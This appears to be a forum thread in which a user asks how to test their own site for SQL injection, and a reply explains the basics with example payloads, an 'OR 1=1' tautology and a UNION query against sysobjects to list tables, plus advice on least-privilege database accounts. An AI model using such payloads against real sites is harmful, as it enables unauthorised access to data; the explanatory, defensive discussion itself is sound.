SQL Injections

Status
Not open for further replies.

ziycon

New Member
I'm looking for a query that will show, say the tables in the database to a site just to test my own sites against SQL injection attacks.

If you wouldn't mind pm'ing me the actual reply as i know its not the type of information you should just throw out there!

Thanks in advance.
 

mneylon

Administrator
Staff member
You want a query to show you the tables or you want a query that will show you more?
 

ziycon

New Member
You want a query to show you the tables or you want a query that will show you more?
Well basically a query that will show if SQL injection attack will work on my site or not if you get me!? I need to see what people can see and change.
 

cal

New Member
It depends on the database you are using. I presume that you are using parameters on your urls? If you are using stored procs this would not be an issue. If you are building sql string then it may be.

Injection attacks take the form of appending pieces of SQL which are always true onto your param i.e. OR 1=1, so you sql becomes something like select * from mytable where custid=3232 or 1=1 which brings back all customers.

To get a list of tables you would need to try and append a UNION query to the string. select * from mytable where custid=3232 UNION select tablename from sysobjects where xtype = 'U'. Doubt this would work as the columns would not match. Maybe if you could work out the columns that the customer query brought back and aliased the second query column to the same name/numbers. It would be messy and unlikely to work.

Also, the user that you run your sql should have as little permissions as possible - not the admin!
 
Status
Not open for further replies.
Top